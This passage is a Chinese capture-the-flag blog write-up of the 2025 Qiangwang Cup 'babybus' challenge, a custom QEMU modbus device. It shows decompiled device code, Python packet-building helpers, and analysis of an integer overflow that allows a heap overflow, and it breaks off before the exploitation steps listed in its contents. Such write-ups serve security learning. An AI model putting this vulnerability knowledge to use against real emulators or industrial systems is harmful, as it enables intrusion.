<!DOCTYPE html>
<html lang="zh-CN"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="manifest" href="/images/site.webmanifest">
  <link rel="shortcut icon" href="/images/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script>
    (function() {
      var savedTheme = localStorage.getItem('user-color-scheme');
      var validThemes = ['dark', 'light', 'blue-white'];
      var theme = validThemes.indexOf(savedTheme) !== -1
        ? savedTheme
        : (window.matchMedia('(prefers-color-scheme: light)').matches ? 'light' : 'dark');
      document.documentElement.setAttribute('data-theme', theme);
    })();
  </script><!-- Begin Jekyll SEO tag v2.9.0 -->
<title>强网杯线上赛 2025 babybus | Y²的博客</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="强网杯线上赛 2025 babybus" />
<meta name="author" content="Y² (aka.cameudis)" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="题目简介" />
<meta name="twitter:description" property="og:description" content="题目简介" />
<link rel="canonical" href="http://localhost:4002/2025/11/11/QWB-Qual-2025-babybus.html" />
<meta property="og:url" content="http://localhost:4002/2025/11/11/QWB-Qual-2025-babybus.html" />
<meta property="og:site_name" content="Y²的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-11-11T00:00:00+08:00" />
<meta property="article:modified_time" content="2025-11-11T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="强网杯线上赛 2025 babybus" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Y² (aka.cameudis)"},"dateModified":"2025-11-11T00:00:00+08:00","datePublished":"2025-11-11T00:00:00+08:00","description":"题目简介","headline":"强网杯线上赛 2025 babybus","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4002/2025/11/11/QWB-Qual-2025-babybus.html"},"url":"http://localhost:4002/2025/11/11/QWB-Qual-2025-babybus.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css?v=20260716-mermaid-colors"><link type="application/atom+xml" rel="alternate" href="http://localhost:4002/feed.xml" title="Y²的博客" /><script src="/assets/js/theme.js?v=20260716-mermaid" defer></script>
</head>
<body class="layout-post"><header class="site-header" role="banner">
  <div class="wrapper"><div class="header-content">
      <div class="header-content-left">
        <a class="site-title" rel="author" href="/">Y²的博客</a>

        <button class="search-button" id="search-toggle" type="button" aria-label="搜索">
          <svg width="20px" height="20px" viewBox="0 0 100 100" style="shape-rendering: crispEdges;">
            <!-- Frame -->
            <rect x="30" y="10" width="10" height="10" />
            <rect x="40" y="10" width="10" height="10" />
            <rect x="50" y="10" width="10" height="10" />
            <rect x="20" y="20" width="10" height="10" />
            <rect x="60" y="20" width="10" height="10" />
            <rect x="10" y="30" width="10" height="10" />
            <rect x="70" y="30" width="10" height="10" />
            <rect x="10" y="40" width="10" height="10" />
            <rect x="70" y="40" width="10" height="10" />
            <rect x="10" y="50" width="10" height="10" />
            <rect x="70" y="50" width="10" height="10" />
            <rect x="20" y="60" width="10" height="10" />
            <rect x="60" y="60" width="10" height="10" />
            <rect x="30" y="70" width="10" height="10" />
            <rect x="40" y="70" width="10" height="10" />
            <rect x="50" y="70" width="10" height="10" />
            <!-- Handle -->
            <rect x="70" y="70" width="10" height="10" />
            <rect x="80" y="80" width="10" height="10" />
            <rect x="90" y="90" width="10" height="10" />
          </svg>
        </button>

        <div class="theme-picker" id="theme-picker">
          <button class="theme-picker-trigger" id="theme-picker-trigger" type="button"
            aria-label="选择主题" aria-haspopup="menu" aria-expanded="false" aria-controls="theme-picker-menu">
            <span class="theme-picker-bracket" aria-hidden="true">[</span>
            <span class="theme-picker-label">THEME</span>
            <span class="theme-picker-divider" aria-hidden="true">//</span>
            <span class="theme-picker-current">蓝白</span>
            <span class="theme-picker-bracket" aria-hidden="true">]</span>
            <span class="theme-picker-arrow" aria-hidden="true"></span>
          </button>
          <div class="theme-picker-menu" id="theme-picker-menu" role="menu" aria-label="主题选项" hidden>
            <button type="button" role="menuitemradio" data-theme-value="dark" data-theme-label="夜间">
              <span class="theme-option-index">01</span>
              <span class="theme-option-swatch theme-option-swatch-dark" aria-hidden="true"></span>
              <span class="theme-option-label">夜间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="light" data-theme-label="日间">
              <span class="theme-option-index">02</span>
              <span class="theme-option-swatch theme-option-swatch-light" aria-hidden="true"></span>
              <span class="theme-option-label">日间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="blue-white" data-theme-label="蓝白">
              <span class="theme-option-index">03</span>
              <span class="theme-option-swatch theme-option-swatch-blue" aria-hidden="true"></span>
              <span class="theme-option-label">蓝白</span>
              <span class="theme-option-state">OFF</span>
            </button>
          </div>
        </div>
      </div><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path
                d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
            </svg>
          </span>
        </label>
        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/diary/">Diary</a><a class="page-link" href="/links/">Links</a><a class="page-link" href="/readings/">Readings</a></div>
      </nav></div>
  </div>
</header>

<!-- 搜索弹窗 -->
<div class="search-overlay" id="search-overlay" aria-hidden="true"
  data-pagefind-url="/pagefind/pagefind.js">
  <div class="search-modal" role="dialog" aria-modal="true" aria-label="文章搜索">
    <div class="search-header">
      <input type="search" id="search-input" placeholder="搜索文章..." autocomplete="off"
        aria-label="搜索文章" aria-controls="search-results">
      <button class="search-close" id="search-close" type="button" aria-label="关闭搜索">&times;</button>
    </div>
    <div class="search-results" id="search-results" aria-live="polite"></div>
  </div>
</div>

<script src="/assets/js/search.js" defer></script>
<main class="page-content" aria-label="Content">
    <div class="wrapper">
      <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

        <header class="post-header">
          <h1 class="post-title p-name" itemprop="name headline"
            data-pagefind-meta="title, date:2025-11-11">强网杯线上赛 2025 babybus</h1>
          <div class="post-meta">
            <time class="dt-published" datetime="2025-11-11T00:00:00+08:00" itemprop="datePublished">[ 2025-11-11 ]
            </time>
            
            <span class="post-tags" data-pagefind-meta="tags">:: #pwn #qemu</span>
            </div>
        </header>

        <div class="post-layout-container">
          <aside class="post-toc">
            <div class="toc-title">TABLE_OF_CONTENTS</div>
            <button class="toc-toggle" type="button" aria-expanded="false" aria-controls="post-toc-list">
              <span class="toc-toggle-label">TABLE_OF_CONTENTS</span>
              <span class="toc-toggle-icon" aria-hidden="true"></span>
            </button>
            <ul id="post-toc-list"><li><a href="#题目简介">题目简介</a></li><li><a href="#漏洞分析">漏洞分析</a></li><li><a href="#漏洞利用">漏洞利用</a><ul><li><a href="#泄漏地址">泄漏地址</a></li><li><a href="#劫持控制流">劫持控制流</a></li><li><a href="#get-shell">get shell</a></li></ul></li><li><a href="#附调试小技巧">附：调试小技巧</a></li><li><a href="#附完整攻击脚本">附：完整攻击脚本</a></li></ul>
          </aside>

          <div class="post-content e-content" itemprop="articleBody" data-pagefind-body>
            <h2 id="题目简介">题目简介</h2>

<p>拿到附件是一个 <code class="language-plaintext highlighter-rouge">qemu-system-x86_64</code> binary 和 Dockerfile、entry script，里面这样启动了 qemu：</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 <span class="se">\</span>
<span class="nt">-machine</span> none <span class="se">\</span>
<span class="nt">-nographic</span> <span class="se">\</span>
<span class="nt">-nodefaults</span> <span class="se">\</span>
<span class="nt">-chardev</span> socket,id<span class="o">=</span>mbus,host<span class="o">=</span>0.0.0.0,port<span class="o">=</span>1502,server<span class="o">=</span>on,wait<span class="o">=</span>off <span class="se">\</span>
<span class="nt">-device</span> modbus-rtu,chardev<span class="o">=</span>mbus,unit-id<span class="o">=</span>1
</code></pre></div></div>

<p>这里没有启动一个完整的系统，只是在 1502 端口绑定了一个名为 <code class="language-plaintext highlighter-rouge">mbus</code> 的字符设备，需要我们去逆向设备的实现。使用 IDA 打开可执行文件，搜索 <code class="language-plaintext highlighter-rouge">modbus</code> 关键词：</p>

<p><img loading="lazy" decoding="async" src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251110162113878.png" alt="image.png" /></p>

<p>这里的逆向过程需要对于 qemu 字符设备的理解，虽然我们没有很多经验，但可以借助 GPT 等 AI 的帮助（也可以对照 qemu 自带的其他各种字符设备的实验），比如可以问它：“在 qemu 中实现一个字符设备需要实现哪些函数？”经过一番对照，可以找到如下这个对设备 class 进行初始化的函数。qemu 虽然是 C 语言实现，但有自己的面向对象机制（QOM），这里的 <code class="language-plaintext highlighter-rouge">modbus_class_init</code> 就是 <code class="language-plaintext highlighter-rouge">modbus</code> 类的构造函数（名字是从下面这个报错信息中得知的）。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">modbus_class_init</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-10h]</span>

  <span class="n">v2</span> <span class="o">=</span> <span class="n">DEVICE_CLASS</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span>
  <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v2</span> <span class="o">+</span> <span class="mh">0x90</span><span class="p">)</span> <span class="o">=</span> <span class="n">modbus_realize</span><span class="p">;</span>
  <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v2</span> <span class="o">+</span> <span class="mh">0x98</span><span class="p">)</span> <span class="o">=</span> <span class="n">sub_40F7D7</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="s">"unit-id"</span> <span class="p">)</span>
    <span class="n">g_assertion_message_expr</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s">"../hw/char/modbus-rtu.c"</span><span class="p">,</span> <span class="mi">289</span><span class="p">,</span> <span class="s">"modbus_class_init"</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="n">device_class_set_props_n</span><span class="p">(</span><span class="n">v2</span><span class="p">,</span> <span class="n">off_1DFD400</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="c1">// "chardev"</span>
  <span class="n">sub_40EB4B</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="n">v2</span> <span class="o">+</span> <span class="mi">96</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>里面调用的 <code class="language-plaintext highlighter-rouge">modbus_realize</code> 函数非常重要（名字也来自报错信息）：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">modbus_realize</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">int</span> <span class="n">a2</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// r9</span>
  <span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">modbus_opaque</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h]</span>

  <span class="n">modbus_opaque</span> <span class="o">=</span> <span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="p">)</span><span class="n">modbus_cast_assert</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">sub_B1EEA6</span><span class="p">(</span><span class="o">&amp;</span><span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">CharBackend</span><span class="p">)</span> <span class="p">)</span>
  <span class="p">{</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">regs</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">regs</span><span class="p">));</span><span class="c1">// buffer</span>
    <span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>                   <span class="c1">// size_count</span>
    <span class="n">qemu_chr_fe_set_handlers</span><span class="p">(</span>
      <span class="p">(</span><span class="n">__int64</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">CharBackend</span><span class="p">,</span>
      <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">modbus_can_read</span><span class="p">,</span>
      <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">modbus_read</span><span class="p">,</span>
      <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">modbus_event</span><span class="p">,</span>
      <span class="mi">0</span><span class="p">,</span>
      <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">modbus_opaque</span><span class="p">,</span>
      <span class="mi">0</span><span class="p">,</span>
      <span class="mi">1</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">else</span>
  <span class="p">{</span>
    <span class="n">error_set_internal</span><span class="p">(</span>
      <span class="n">a2</span><span class="p">,</span>
      <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="s">"../hw/char/modbus-rtu.c"</span><span class="p">,</span>
      <span class="mi">263</span><span class="p">,</span>
      <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="s">"modbus_realize"</span><span class="p">,</span>
      <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="s">"Can't create modbus-rtu device, empty char device"</span><span class="p">,</span>
      <span class="n">v2</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>这里绑定了 modbus 相关的诸多操作，简单逆向可知整个设备的逻辑是：</p>

<ul>
  <li>在 <code class="language-plaintext highlighter-rouge">modbus_event</code> 中初始化 count 为 0；</li>
  <li>通过 <code class="language-plaintext highlighter-rouge">modbus_can_read</code> 检测设备缓冲区还能读多少个字符；</li>
  <li>在 <code class="language-plaintext highlighter-rouge">modbus_read</code> 中读入字符放置到设备缓冲区中，调用 <code class="language-plaintext highlighter-rouge">resolve_modbus</code> 函数做具体的处理。</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">modbus_event</span><span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">modbus_opaque</span><span class="p">,</span> <span class="kt">int</span> <span class="n">a2</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">a2</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span>                                <span class="c1">// CHR_EVENT_OPENED</span>
    <span class="n">modbus_opaque</span><span class="o">-&gt;</span><span class="n">count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">modbus_can_read</span><span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">opaque</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">return</span> <span class="mh">0x104</span> <span class="o">-</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">opaque</span><span class="o">-&gt;</span><span class="n">count</span><span class="p">;</span>   <span class="c1">// 0x104 - size_count</span>
<span class="p">}</span>

<span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">modbus_read</span><span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">opaque</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">size_t</span> <span class="n">n_1</span><span class="p">;</span> <span class="c1">// rax</span>
  <span class="kt">size_t</span> <span class="n">n</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-8h]</span>

  <span class="k">if</span> <span class="p">(</span> <span class="n">size</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">)</span>
  <span class="p">{</span>
    <span class="n">n_1</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span> <span class="mh">0x104LL</span> <span class="o">-</span> <span class="n">opaque</span><span class="o">-&gt;</span><span class="n">count</span> <span class="o">&lt;=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="n">__int64</span><span class="p">)</span><span class="n">size</span> <span class="p">)</span><span class="c1">// 包最大大小为0x104</span>
      <span class="n">n_1</span> <span class="o">=</span> <span class="mh">0x104LL</span> <span class="o">-</span> <span class="n">opaque</span><span class="o">-&gt;</span><span class="n">count</span><span class="p">;</span>
    <span class="n">n</span> <span class="o">=</span> <span class="n">n_1</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">n_1</span> <span class="p">)</span>
    <span class="p">{</span>
      <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">opaque</span><span class="o">-&gt;</span><span class="n">pak</span><span class="p">[</span><span class="n">opaque</span><span class="o">-&gt;</span><span class="n">count</span><span class="p">],</span> <span class="n">src</span><span class="p">,</span> <span class="n">n_1</span><span class="p">);</span>
      <span class="n">opaque</span><span class="o">-&gt;</span><span class="n">count</span> <span class="o">+=</span> <span class="n">n</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">while</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span><span class="p">)</span><span class="n">resolve_modbus</span><span class="p">(</span><span class="n">opaque</span><span class="p">)</span> <span class="p">)</span>
      <span class="p">;</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>结合 modbus 网上的相关资料逆向，<code class="language-plaintext highlighter-rouge">resolve_modbus</code> 只是实现了 modbus 协议中最常见的两种操作——读和写。modbus 由于是工控协议，相对来说比较底层，因此存在 CRC 校验码字段。我们为了写脚本和设备交互，需要自己实现一下校验码计算，只需要将计算校验码的那个函数的伪代码复制给 AI 让它用 python 实现一下就可以了。下面就可以写出几个交互函数。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">calc_crc</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">endian</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">int</span><span class="p">:</span>
    <span class="n">crc</span> <span class="o">=</span> <span class="mh">0xFFFF</span>
    <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nf">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
        <span class="n">crc</span> <span class="o">^=</span> <span class="n">b</span>
        <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
            <span class="n">crc</span> <span class="o">=</span> <span class="p">((</span><span class="n">crc</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="o">^</span> <span class="mh">0xA001</span><span class="p">)</span> <span class="nf">if </span><span class="p">(</span><span class="n">crc</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span> <span class="nf">else </span><span class="p">(</span><span class="n">crc</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span>
            <span class="n">crc</span> <span class="o">&amp;=</span> <span class="mh">0xFFFF</span>
    <span class="k">return</span> <span class="n">crc</span>

<span class="k">def</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">endian</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">'</span><span class="s">little</span><span class="sh">'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bytes</span><span class="p">:</span>
    <span class="k">return</span> <span class="nf">calc_crc</span><span class="p">(</span><span class="n">data</span><span class="p">).</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">endian</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">func03</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">quant</span><span class="p">):</span>
    <span class="n">pak</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x01\x03</span><span class="sh">'</span> <span class="o">+</span> <span class="n">addr</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="n">quant</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">pak</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">pak</span>

<span class="k">def</span> <span class="nf">func10</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">quant</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
    <span class="n">pak</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x01\x10</span><span class="sh">'</span> <span class="o">+</span> <span class="n">addr</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span> <span class="o">+</span> <span class="n">quant</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="p">(</span><span class="n">quant</span><span class="o">*</span><span class="mi">2</span><span class="p">).</span><span class="nf">to_bytes</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">pak</span> <span class="o">+=</span> <span class="n">data</span> <span class="c1"># for func03
</span>    <span class="c1"># for i in range(quant):
</span>        <span class="c1"># pak += data[i*2:i*2+2][::-1]
</span>    <span class="n">pak</span> <span class="o">+=</span> <span class="nf">crc_bytes</span><span class="p">(</span><span class="n">pak</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">pak</span>
</code></pre></div></div>

<h2 id="漏洞分析">漏洞分析</h2>

<p>读功能（<code class="language-plaintext highlighter-rouge">func03</code>）的实现：</p>

<p><img loading="lazy" decoding="async" src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251110164342881.png" alt="image.png" /></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">func03</span><span class="p">(</span><span class="n">modbus_opaque</span> <span class="o">*</span><span class="n">struct_a1</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="n">ppak</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rax</span>
  <span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="n">char2D2</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-24h]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+1Eh] [rbp-22h]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">starting_addr</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-20h]</span>
  <span class="kt">unsigned</span> <span class="kr">__int16</span> <span class="n">quantity_of_regs</span><span class="p">;</span> <span class="c1">// [rsp+22h] [rbp-1Eh]</span>
  <span class="kr">__int16</span> <span class="n">___0x100_______2___</span><span class="p">;</span> <span class="c1">// [rsp+26h] [rbp-1Ah]</span>
  <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">n3</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-18h]</span>
  <span class="kt">char</span> <span class="o">*</span><span class="n">response</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-8h]</span>

  <span class="n">char2D2</span> <span class="o">=</span> <span class="o">*</span><span class="n">ppak</span><span class="p">;</span>
  <span class="n">starting_addr</span> <span class="o">=</span> <span class="n">_byteswap_ushort</span><span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">ppak</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span><span class="c1">// 大端法</span>
  <span class="n">quantity_of_regs</span> <span class="o">=</span> <span class="n">_byteswap_ushort</span><span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">ppak</span> <span class="o">+</span> <span class="mi">2</span><span class="p">));</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">quantity_of_regs</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int16</span><span class="p">)(</span><span class="n">starting_addr</span> <span class="o">+</span> <span class="n">quantity_of_regs</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mh">0x100u</span> <span class="p">)</span><span class="c1">// 整数溢出</span>
  <span class="p">{</span>
    <span class="n">response</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">g_malloc</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kr">__int8</span><span class="p">)(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">quantity_of_regs</span><span class="p">)</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span><span class="c1">// 整数溢出，可以构造堆溢出</span>
    <span class="o">*</span><span class="n">response</span> <span class="o">=</span> <span class="n">char2D2</span><span class="p">;</span>
    <span class="n">response</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span>
    <span class="n">n3</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span>
    <span class="n">response</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">quantity_of_regs</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">quantity_of_regs</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
    <span class="p">{</span>
      <span class="n">d</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">struct_a1</span><span class="o">-&gt;</span><span class="n">regs</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">starting_addr</span><span class="p">];</span><span class="c1">// 一共有0x100个寄存器（每个2字节）</span>
      <span class="n">response</span><span class="p">[</span><span class="n">n3</span><span class="p">]</span> <span class="o">=</span> <span class="n">HIBYTE</span><span class="p">(</span><span class="n">d</span><span class="p">);</span>
      <span class="n">v2</span> <span class="o">=</span> <span class="n">n3</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
      <span class="n">n3</span> <span class="o">+=</span> <span class="mi">2LL</span><span class="p">;</span>
      <span class="n">response</span><span class="p">[</span><span class="n">v2</span><span class="p">]</span> <span class="o">=</span> <span class="n">d</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">response</span><span class="p">[</span><span class="n">n3</span><span class="p">]</span> <span class="o">=</span> <span class="n">calc_crc</span><span class="p">(</span><span class="n">response</span><span class="p">,</span> <span class="n">n3</span><span class="p">);</span>
    <span class="n">modbus_writeout</span><span class="p">(</span><span class="n">struct_a1</span><span class="p">,</span> <span class="p">(</span><span class="n">__int64</span><span class="p">)</span><span class="n">response</span><span class="p">,</span> <span class="n">n3</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
